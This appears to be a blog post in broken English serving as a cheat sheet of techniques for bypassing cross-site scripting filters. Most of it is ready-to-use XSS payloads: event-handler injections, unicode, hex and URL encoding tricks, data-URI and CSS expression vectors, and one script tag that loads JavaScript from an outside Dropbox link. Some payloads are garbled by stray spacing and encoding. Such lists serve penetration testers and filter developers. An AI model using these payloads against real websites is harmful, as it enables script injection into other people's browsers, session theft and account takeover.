Everythings do to bypass XSS filter
On this post, i want to introduce the tips to bypass XSS filter.
Cross Site Scripting (XSS) is a Web application attack in the data output to the page when there is a problem, leading to an attacker can be constructed malicious data displayed in the page vulnerability. Because the cross-site scripting attacks are to the page content to write a malicious script or HTML code, so cross-site scripting vulnerability is also known as HTML injection vulnerability.
Unlike SQL injection attacks database server mode, cross-site scripting vulnerability is caused by the client to launch the attack, that is, the use of cross-site scripting vulnerabilities inject malicious code is running in the user’s browser on a computer.
Bypass XSS filter methodologies
Rule 1: Injecting Harless HTML <b>, <i>, <u>
Rule 2: Injecting HTML Entities
<script src=”http://www.dropbox.com/s/hp796og5p9va7zt/face.js?dl=1″></script>
Rule 3: Injecting Script Tag
Rule 4: Testing for recursive Filters — Testing if filter is replacing malicious tags/characters with whitespaces.
Rule 5: Injecting Anchor Tag
<a href=””>click</a>
Rule 6: Testing for event handlers
Rule 7: Input less common event handlers
Rule 8: Testing with src attribute
Rule 9: Testing with action attribute
Rule 10: Injecting HTML 5 based payloads
Some technique to bypass XSS filter
- Create a payload without space:
<h1 id=”xss”onmouseover=”prompt(1)”>a
<style/onload=alert(1)> - Use unicode
<p id=”\u0070rompt(1)”onmouseover=\u0065val(id)>a</p>
%26 instead of &
<a href=”data: , < 
 script > alert(1) < /script > “>CLICK #firefox - closing angular bracket as a value of class attribute and the purpose is to fool the parser
<p id=’>’onmouseover=prompt(1)>aaaa</p>
<p class=’>’onmouseup=confirm(1)>aaaa</p> - Use of “ instead of parenthesis () for function call. ES6 provides this.
<a style=’color:red’onmouseover=this.onmouseover=alert`1`>aaa</a> - Used source property of regexp object. It returns the string without slashes. The purpose is to defeat black-listed keyword confirm.
<a class=’xss’style=’color:red’href=’?’onmouseover=id=/confir/.source+’m’+'(1)’; onmousedown=eval(id)>click</a> - Use contenteditable attribute
<h1 class=’xss’contenteditable=”true”onkeydown=confirm(/xss/)>xss</h1> - Use draggable attribute
<p class=’xss’draggable=”true”ondragstart=alert`1`>xss</p>
<a class=’xss’draggable=”true”href=’?’ondragenter/ondragleave=alert`1`>xss</a> - Use %2f instead of /
<marquee%2fonstart=confirm`1` - Decimal encoding of character “t” == t while & == %26 and # == %23
- Hex encoding of character “t” and then URL encode & and # sign
- Hex encoding of : (IE specific) and then URL encode & and #
- Old Trick (IE Specific) URL = name while name == javascript:alert(1)
<iframe name=javascript:confirm(1) onload=”URL=name”> - URL=i OR any alphabet
<iframe/i=’javascript:alert(1)’onload=’URL=i’> - Use style tag if iframe tag had been blocked
<style/i=javascript:alert(1)’onload=’URL=i’> - Half-close XSS payloads
<div/onmouseover=confirm(1)>div</div - Evasion-via-data-uri-scheme
/* HTML5 based entities were doing good in bypassing data URI RE */
<a href=’data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+’>click</a><a href=’data:application/x-x509-user-cert;
base64 NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==’>click</a>
/* Both are Firefox specific payloads *//* The RE initially thinks that base64 keyword is necessary. */
<a href=”data:x,% 3 c script % 3 e alert(1) % 3 c/script %3 e”>click</a>/* The RE thinks that only alphanumeric characters are allowed after data URI */
<a href=”data:@[‘{§(`__`)$}’]@, % 3 c script % 3 e alert(1) % 3 c/script %3 e”>click</a> - Xss-style-attr
/* The first two payloads bypasses the check on word expression with the help of \ */
<div style=”x:e\x\p\r\ession(alert(1))”>div</div><p style=’\x:\65xpre\73sio\6e(alert(1))’>hello barracuda</p>
/* The regular expression was expecting ( after the keyword expression */
<div style=”width:expression\28 alert \28 1\29 \29″>I will bypass you</div>/* Decimal Encoding without the presence of ; bypasses the regular expression */
<div style=”width:expression(alert( 1))″>I will not match</div>
- Use location property
<img onerror=”location=’javascript:=alert(1)'” src=”x”><img onerror=”location=’javascript:%61lert(1)'” src=”x”>
<img onerror=”location=’javascript:\x2561lert(1)'” src=”x”>
<img onerror=”location=’javascript:\x255Cu0061lert(1)'” src=”x” >
data:html=1;alert(1)/*,<body%20onload=eval(location.href)><title>*/;alert(2) //Firefox
<base href=javascript://test/”><a href=”%0Aalert(1)”>test</a>
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=%26>
- Edge vectors by @jackmasa
- Misc vectors by @jackmasa
<a href=”” onclick=“/name==alert(1)>clickme</a>
<a href=”” onclick=“/*/alt=”*//alert(1)//”>clickme</a>
Reference: slideshare